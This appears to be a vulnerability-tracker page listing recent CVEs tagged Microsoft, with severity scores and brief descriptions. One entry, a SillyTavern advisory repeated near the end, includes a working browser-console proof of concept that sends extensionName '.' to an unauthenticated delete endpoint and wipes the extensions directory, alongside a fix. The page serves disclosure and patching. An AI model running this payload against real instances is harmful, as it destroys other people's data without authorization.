Skip to main content

Microsoft

17290 CVEs vendor

Monthly

CVE-2026-43483 MEDIUM PATCH This Month

CR8 write interception mismanagement in KVM's AMD SVM implementation crashes Windows guests on AMD hypervisors with AVIC enabled. When KVM emulates INIT→WFS sequences while AVIC is temporarily deactivated, the CR8 write intercept flag is not cleared upon AVIC reactivation, leaving it permanently enabled. In isolation this is a performance regression, but combined with the TPR synchronization flaw addressed by commit d02e48830e3f, the divergence between hardware-visible and guest-visible TPR values becomes fatal to Windows guests. No public exploit identified at time of analysis; EPSS is 0.02% (7th percentile) and no CISA KEV listing exists.

Linux Microsoft Information Disclosure Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2024-47091 MEDIUM PATCH This Month

Privilege escalation in the mk_mysql agent plugin on Windows in Checkmk <2.4.0p29, <2.3.0p47, and 2.2.0 (EOL) allows a local unprivileged user able to create a Windows service whose name matches. Rated medium severity (CVSS 5.2), this vulnerability is low attack complexity.

Microsoft RCE Privilege Escalation
NVD VulDB
CVSS 4.0
5.2
EPSS
0.0%
CVE-2026-44612 HIGH This Week

DLL hijacking in Bytello Share (Windows Edition) installer prior to version 5.13.0.4246 allows local attackers to execute arbitrary code with the privileges of the installing user. The installer insecurely loads DLLs from its current directory, enabling attackers who can place a malicious DLL in the same location to achieve code execution when a user runs the installer. EPSS probability is very low (0.01%, 3rd percentile) with no active exploitation identified, suggesting this requires significant local access prerequisites that limit real-world risk despite the high CVSS score.

Microsoft RCE
NVD
CVSS 4.0
8.4
EPSS
0.0%
CVE-2026-44650 npm CRITICAL PATCH GHSA Act Now

## Summary `POST /api/extensions/delete` endpoint accepts `extensionName: "."` which bypasses `sanitize-filename` validation, causing the entire user extensions directory to be recursively deleted. No authentication is required in the default configuration. ## Affected File `src/endpoints/extensions.js` (last modified: commit `3ad9b05e2`) ## Root Cause The validation check occurs **before** sanitization: ```javascript // [1] "." is truthy - passes the check if (!request.body.extensionName) { return response.status(400).send('Bad Request'); } // [2] sanitize(".") → "" const extensionPath = path.join(basePath, sanitize(extensionName)); // path.join("data\\default-user\\extensions", "") // = "data\\default-user\\extensions" ← basePath itself! // [3] Deletes the entire extensions directory await fs.promises.rm(extensionPath, { recursive: true }); ``` `sanitize-filename` converts `"."` to `""` (documented behavior). `path.join(basePath, "")` returns `basePath` itself. Result: the entire `data\default-user\extensions\` directory is deleted. ## Proof of Concept Tested on: Windows 10, SillyTavern v1.17.0, commit `004f1336e` Authentication: none (basicAuthMode: false, default configuration) Run in browser console (F12) while SillyTavern is open: ```javascript async function poc() { const { token } = await (await fetch('/csrf-token')).json(); const headers = { 'Content-Type': 'application/json', 'X-CSRF-Token': token, }; // Before: 1 extension installed const before = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('Before:', before.filter(e => e.type === 'local')); // [{ type: 'local', name: 'third-party/Extension-Notebook' }] // Attack const res = await fetch('/api/extensions/delete', { method: 'POST', headers, body: JSON.stringify({ extensionName: '.' }), }); console.log('Status:', res.status); // 200 console.log('Body:', await res.text()); // "Extension has been deleted at data\default-user\extensions" // After: empty const after = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('After:', after.filter(e => e.type === 'local')); // [] } poc(); ``` **Result:** Before: [{ type: 'local', name: 'third-party/Extension-Notebook' }] Status: 200 Body: Extension has been deleted at data\default-user\extensions After: [] ## Impact - **No authentication required** (`basicAuthMode: false` by default). Any user with network access to the SillyTavern instance can permanently delete the entire extensions directory with a single HTTP request. - All installed third-party extensions are unrecoverably lost. - With `global: true` and admin privileges, the global extensions directory shared across all users can also be deleted. - This vulnerability can be chained with CVE-2025-59159 (DNS rebinding) to enable unauthenticated remote exploitation from a malicious website. ## Same Pattern in Other Endpoints The same vulnerability exists in: - `POST /api/extensions/update` - `POST /api/extensions/version` - `POST /api/extensions/branches` - `POST /api/extensions/switch` ## Suggested Fix ```javascript const sanitized = sanitize(extensionName); // Check AFTER sanitizing if (!sanitized) { return response.status(400).send('Bad Request: Invalid extension name.'); } const extensionPath = path.join(basePath, sanitized); // Additional path traversal guard const resolvedPath = path.resolve(extensionPath); const resolvedBase = path.resolve(basePath); if (!resolvedPath.startsWith(resolvedBase + path.sep)) { return response.status(400).send('Bad Request: Invalid extension path.'); } ``` Apply the same fix to `/update`, `/version`, `/branches`, and `/switch` endpoints. ## References - CWE-22: Improper Limitation of a Pathname to a Restricted Directory - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H (9.1 Critical) - sanitize-filename npm: https://www.npmjs.com/package/sanitize-filename - Related CVE (same project): CVE-2025-59159 ##REPORTED BY Jormungandr

Microsoft Node.js CSRF Path Traversal
NVD GitHub
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-20767 HIGH This Week

Improper input validation for some Intel(R) QAT software drivers for Windows before version 1.13 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

Privilege Escalation Microsoft Intel
NVD VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-20714 HIGH This Week

Out-of-bounds write for some Intel(R) QAT software drivers for Windows before version 1.13 within Ring 3: User Applications may allow a escalation of privilege. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

Microsoft Buffer Overflow Memory Corruption Privilege Escalation Intel
NVD VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-42141 HIGH PATCH This Week

Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability in the Xibo CMS allows users with Library upload permissions to make arbitrary HTTP requests from the CMS server to internal or external network resources. This can be exploited to scan internal infrastructure, access local cloud metadata endpoints (e.g., AWS IMDS), interact with internal services that lack authentication, or exfiltrate data. This vulnerability is fixed in 4.4.1.

SSRF Microsoft
NVD GitHub
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-42177 MEDIUM PATCH This Month

linux-entra-sso is a browser plugin for Linux to SSO on Microsoft Entra ID. Prior to 1.8.1, platform/chrome/js/platform-chrome.js:69-88 registers a single declarativeNetRequest rule whose urlFilter is Platform.SSO_URL + "/*", i.e. "https://login.microsoftonline.com/*". Chrome's urlFilter without a | or || anchor is substring-matched against the full request URL. The same applied rule action is modifyHeaders that attaches the Entra ID Primary Refresh Token cookie. The Firefox adapter in platform/firefox/js/platform-firefox.js:53 performs a belt-and-braces startsWith(Platform.SSO_URL) check before injecting the header; the Chrome adapter does not. When the extension holds broad host permissions through the optional_host_permissions: ["https://*/*"] declared in platform/chrome/manifest.json:34, a main-frame navigation to a URL whose path embeds https://login.microsoftonline.com/ causes Chrome to attach the PRT cookie to the request to the attacker-controlled host. This vulnerability is fixed in 1.8.1.

Authentication Bypass Mozilla Microsoft Google Chrome
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-33821 HIGH PATCH NEWS This Week

Improper privilege management in Microsoft Dynamics 365 Customer Insights allows an authorized attacker to elevate privileges over a network.

Privilege Escalation Microsoft
NVD VulDB
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-42838 MEDIUM PATCH Exploit Unlikely This Month

Improper neutralization of special elements in output used by a downstream component ('injection') in Microsoft Edge (Chromium-based) allows an unauthorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft Google
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-40416 MEDIUM PATCH This Month

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Google
NVD VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-42833 CRITICAL PATCH Exploit Unlikely Act Now

Execution with unnecessary privileges in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.

Privilege Escalation Microsoft
NVD VulDB
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-42832 HIGH PATCH This Week

Improper access control in Microsoft Office allows an unauthorized attacker to perform spoofing locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-42830 MEDIUM PATCH Exploit Unlikely This Month

Untrusted search path in Azure Monitor Agent allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-42823 CRITICAL PATCH Exploit Unlikely Act Now

Improper access control in Azure Logic Apps allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
9.9
EPSS
0.1%
CVE-2026-41103 CRITICAL PATCH NEWS Exploit Likely Act Now

Incorrect implementation of authentication algorithm in Microsoft SSO Plugin for Jira &amp; Confluence allows an unauthorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft Atlassian
NVD VulDB
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-40381 HIGH PATCH Exploit Unlikely This Week

Improper access control in Azure Connected Machine Agent allows an authorized attacker to elevate privileges locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-41097 MEDIUM PATCH Exploit Unlikely This Month

Reliance on a component that is not updateable in Windows Secure Boot allows an authorized attacker to bypass a security feature locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
6.7
EPSS
0.2%
CVE-2026-41086 HIGH PATCH Exploit Unlikely This Week

Improper access control in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-40420 HIGH PATCH Exploit Unlikely This Week

Improper access control in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-35436 HIGH PATCH Exploit Unlikely This Week

Insufficient granularity of access control in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-40418 HIGH PATCH This Week

Use after free in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-40413 HIGH PATCH Exploit Unlikely This Week

Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service over an adjacent network.

Denial Of Service Microsoft Null Pointer Dereference
NVD VulDB
CVSS 3.1
7.4
EPSS
0.1%
CVE-2026-40403 HIGH PATCH NEWS Exploit Unlikely This Week

Heap-based buffer overflow in Windows Win32K - GRFX allows an authorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-40402 CRITICAL PATCH NEWS Exploit Unlikely Act Now

Use after free in Windows Hyper-V allows an unauthorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
9.3
EPSS
0.0%
CVE-2026-40401 HIGH PATCH This Week

Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service locally.

Denial Of Service Microsoft Null Pointer Dereference
NVD VulDB
CVSS 3.1
7.1
EPSS
0.1%
CVE-2026-40398 HIGH PATCH Exploit Likely This Week

Heap-based buffer overflow in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-32209 MEDIUM PATCH This Month

Improper access control in Windows Filtering Platform (WFP) allows an authorized attacker to bypass a security feature locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
4.4
EPSS
0.0%
CVE-2026-40397 HIGH PATCH Exploit Likely This Week

Integer underflow (wrap or wraparound) in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

Integer Overflow Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-40382 HIGH PATCH Exploit Unlikely This Week

Use after free in Windows Telephony Service allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-40369 HIGH PATCH Exploit Likely This Week

Untrusted pointer dereference in Windows Kernel allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure Windows 11 Version 24H2 Windows 11 Version 25H2 Windows 11 Version 26H1 +2
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-40367 HIGH PATCH NEWS This Week

Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
8.4
EPSS
0.0%
CVE-2026-40365 HIGH PATCH NEWS Exploit Unlikely This Week

Insufficient granularity of access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-40362 HIGH PATCH Exploit Unlikely This Week

Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-40361 HIGH PATCH NEWS Exploit Likely This Week

Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
8.4
EPSS
0.1%
CVE-2026-40359 HIGH PATCH Exploit Unlikely This Week

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-40358 HIGH PATCH NEWS Exploit Unlikely This Week

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
8.4
EPSS
0.0%
CVE-2026-40357 HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
CVSS 3.1
8.8
EPSS
0.5%
CVE-2026-34341 HIGH PATCH Exploit Unlikely This Week

Double free in Windows Link-Layer Discovery Protocol (LLDP) allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
7.0
EPSS
0.0%
CVE-2026-34340 HIGH PATCH Exploit Unlikely This Week

Use after free in Windows Projected File System allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.0
EPSS
0.0%
CVE-2026-34339 MEDIUM PATCH Exploit Unlikely This Month

Null pointer dereference in Windows LDAP - Lightweight Directory Access Protocol allows an authorized attacker to deny service locally.

Denial Of Service Microsoft Null Pointer Dereference
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-34338 HIGH PATCH Exploit Unlikely This Week

Use after free in Windows Telephony Service allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-34337 HIGH PATCH Exploit Unlikely This Week

Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-34336 HIGH PATCH This Week

Buffer over-read in Windows DWM Core Library allows an authorized attacker to disclose information locally.

Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-34334 HIGH PATCH This Week

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.

Microsoft Race Condition Information Disclosure
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-34332 HIGH PATCH This Week

Use after free in Windows Kernel-Mode Drivers allows an authorized attacker to execute code over a network.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
8.0
EPSS
0.1%
CVE-2026-33838 HIGH PATCH Exploit Unlikely This Week

Double free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-33837 HIGH PATCH Exploit Likely This Week

Heap-based buffer overflow in Windows TCP/IP allows an authorized attacker to elevate privileges locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-33835 HIGH PATCH Exploit Likely This Week

Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-33833 HIGH PATCH Exploit Unlikely This Week

Improper neutralization of special elements in output used by a downstream component ('injection') in Azure Machine Learning allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Azure Machine Learning
NVD VulDB
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-33112 HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
CVSS 3.1
8.8
EPSS
0.5%
CVE-2026-33110 HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
CVSS 3.1
8.8
EPSS
0.5%
CVE-2026-42898 CRITICAL PATCH NEWS Act Now

Improper control of generation of code ('code injection') in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.

Microsoft Code Injection RCE
NVD VulDB
CVSS 3.1
9.9
EPSS
0.1%
CVE-2026-42896 HIGH PATCH Exploit Unlikely This Week

Integer overflow or wraparound in Windows DWM Core Library allows an authorized attacker to elevate privileges locally.

Integer Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-35429 MEDIUM PATCH This Month

User interface (ui) misrepresentation of critical information in Microsoft Edge for Android allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Google
NVD VulDB
CVSS 3.1
4.3
EPSS
0.1%
CVE-2026-42891 MEDIUM PATCH This Month

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

Authentication Bypass Microsoft Google
NVD VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-42825 HIGH PATCH This Week

Use after free in Windows Telephony Service allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.0
EPSS
0.0%
CVE-2026-41107 HIGH PATCH Exploit Unlikely This Week

External control of file name or path in Microsoft Edge (Chromium-based) allows an unauthorized attacker to disclose information over a network.

Microsoft Information Disclosure Google
NVD VulDB
CVSS 3.1
7.4
EPSS
0.1%
CVE-2026-42831 HIGH PATCH NEWS This Week

Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-32185 MEDIUM PATCH Exploit Unlikely This Month

Files or directories accessible to external parties in Microsoft Teams allows an unauthorized attacker to perform spoofing locally.

Microsoft Information Disclosure Path Traversal
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-32170 MEDIUM PATCH Exploit Unlikely This Month

Double free in Windows Rich Text Edit Control allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
6.7
EPSS
0.1%
CVE-2026-32161 HIGH PATCH NEWS Exploit Unlikely This Week

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Native WiFi Miniport Driver allows an unauthorized attacker to execute code over an adjacent network.

Authentication Bypass Microsoft Race Condition
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-41102 HIGH PATCH This Week

Improper access control in Microsoft Office PowerPoint allows an authorized attacker to perform spoofing locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-41101 HIGH PATCH This Week

Improper access control in Microsoft Office Word allows an authorized attacker to perform spoofing locally.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-41096 CRITICAL PATCH NEWS Act Now

Heap-based buffer overflow in Microsoft Windows DNS allows an unauthorized attacker to execute code over a network.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-41094 HIGH PATCH Exploit Unlikely This Week

Improper control of generation of code ('code injection') in Microsoft Data Formulator allows an unauthorized attacker to execute code over a network.

Microsoft Code Injection RCE
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-41089 CRITICAL POC PATCH NEWS Exploit Unlikely Act Now

Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.

Stack Overflow Microsoft Buffer Overflow
NVD VulDB GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-41088 HIGH PATCH This Week

External control of file name or path in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.

Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-40421 MEDIUM PATCH Exploit Unlikely This Month

External control of file name or path in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.

Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-40419 HIGH PATCH Exploit Unlikely This Week

Use after free in Microsoft Office allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-40415 HIGH PATCH This Week

Use after free in Windows TCP/IP allows an unauthorized attacker to execute code over a network.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
8.1
EPSS
0.1%
CVE-2026-40414 HIGH PATCH This Week

Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service over an adjacent network.

Denial Of Service Microsoft Null Pointer Dereference
NVD VulDB
CVSS 3.1
7.4
EPSS
0.1%
CVE-2026-40410 HIGH PATCH Exploit Unlikely This Week

Use after free in Windows SMB Client allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.0
EPSS
0.0%
CVE-2026-40408 HIGH PATCH Exploit Unlikely This Week

Use after free in Windows Kernel-Mode Drivers allows an authorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-40407 HIGH PATCH This Week

Heap-based buffer overflow in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-40406 HIGH PATCH Exploit Unlikely This Week

Use after free in Windows TCP/IP allows an unauthorized attacker to disclose information over a network.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-40405 HIGH PATCH Exploit Unlikely This Week

Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service over a network.

Denial Of Service Microsoft Null Pointer Dereference
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-40399 HIGH PATCH Exploit Unlikely This Week

Stack-based buffer overflow in Windows TCP/IP allows an authorized attacker to elevate privileges locally.

Stack Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-40377 HIGH PATCH Exploit Unlikely This Week

Heap-based buffer overflow in Windows Cryptographic Services allows an authorized attacker to elevate privileges locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-40368 HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
CVSS 3.1
8.0
EPSS
0.3%
CVE-2026-40366 HIGH PATCH NEWS Exploit Unlikely This Week

Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
8.4
EPSS
0.0%
CVE-2026-40364 HIGH PATCH NEWS Exploit Likely This Week

Access of resource using incompatible type ('type confusion') in Microsoft Office Word allows an unauthorized attacker to execute code locally.

Authentication Bypass Microsoft Memory Corruption
NVD VulDB
CVSS 3.1
8.4
EPSS
0.1%
CVE-2026-40363 HIGH PATCH NEWS Exploit Unlikely This Week

Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
8.4
EPSS
0.0%
CVE-2026-40360 HIGH PATCH This Week

Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.

Microsoft Information Disclosure Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-35440 MEDIUM PATCH Exploit Unlikely This Month

Files or directories accessible to external parties in Microsoft Office Word allows an unauthorized attacker to disclose information locally.

Microsoft Information Disclosure Path Traversal
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-35439 HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
CVSS 3.1
8.8
EPSS
0.5%
CVE-2026-35438 HIGH PATCH Exploit Unlikely This Week

Missing authorization in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
8.3
EPSS
0.1%
CVE-2026-35424 HIGH PATCH This Week

Missing release of memory after effective lifetime in Windows Internet Key Exchange (IKE) Protocol allows an unauthorized attacker to deny service over a network.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-35422 MEDIUM PATCH This Month

Authentication bypass using an alternate path or channel in Windows TCP/IP allows an authorized attacker to bypass a security feature over a network.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-35421 HIGH PATCH NEWS This Week

Heap-based buffer overflow in Windows GDI allows an unauthorized attacker to execute code locally.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

CR8 write interception mismanagement in KVM's AMD SVM implementation crashes Windows guests on AMD hypervisors with AVIC enabled. When KVM emulates INIT→WFS sequences while AVIC is temporarily deactivated, the CR8 write intercept flag is not cleared upon AVIC reactivation, leaving it permanently enabled. In isolation this is a performance regression, but combined with the TPR synchronization flaw addressed by commit d02e48830e3f, the divergence between hardware-visible and guest-visible TPR values becomes fatal to Windows guests. No public exploit identified at time of analysis; EPSS is 0.02% (7th percentile) and no CISA KEV listing exists.

Linux Microsoft Information Disclosure +2
NVD VulDB
EPSS 0% CVSS 5.2
MEDIUM PATCH This Month

Privilege escalation in the mk_mysql agent plugin on Windows in Checkmk <2.4.0p29, <2.3.0p47, and 2.2.0 (EOL) allows a local unprivileged user able to create a Windows service whose name matches. Rated medium severity (CVSS 5.2), this vulnerability is low attack complexity.

Microsoft RCE Privilege Escalation
NVD VulDB
EPSS 0% CVSS 8.4
HIGH This Week

DLL hijacking in Bytello Share (Windows Edition) installer prior to version 5.13.0.4246 allows local attackers to execute arbitrary code with the privileges of the installing user. The installer insecurely loads DLLs from its current directory, enabling attackers who can place a malicious DLL in the same location to achieve code execution when a user runs the installer. EPSS probability is very low (0.01%, 3rd percentile) with no active exploitation identified, suggesting this requires significant local access prerequisites that limit real-world risk despite the high CVSS score.

Microsoft RCE
NVD
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

## Summary `POST /api/extensions/delete` endpoint accepts `extensionName: "."` which bypasses `sanitize-filename` validation, causing the entire user extensions directory to be recursively deleted. No authentication is required in the default configuration. ## Affected File `src/endpoints/extensions.js` (last modified: commit `3ad9b05e2`) ## Root Cause The validation check occurs **before** sanitization: ```javascript // [1] "." is truthy - passes the check if (!request.body.extensionName) { return response.status(400).send('Bad Request'); } // [2] sanitize(".") → "" const extensionPath = path.join(basePath, sanitize(extensionName)); // path.join("data\\default-user\\extensions", "") // = "data\\default-user\\extensions" ← basePath itself! // [3] Deletes the entire extensions directory await fs.promises.rm(extensionPath, { recursive: true }); ``` `sanitize-filename` converts `"."` to `""` (documented behavior). `path.join(basePath, "")` returns `basePath` itself. Result: the entire `data\default-user\extensions\` directory is deleted. ## Proof of Concept Tested on: Windows 10, SillyTavern v1.17.0, commit `004f1336e` Authentication: none (basicAuthMode: false, default configuration) Run in browser console (F12) while SillyTavern is open: ```javascript async function poc() { const { token } = await (await fetch('/csrf-token')).json(); const headers = { 'Content-Type': 'application/json', 'X-CSRF-Token': token, }; // Before: 1 extension installed const before = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('Before:', before.filter(e => e.type === 'local')); // [{ type: 'local', name: 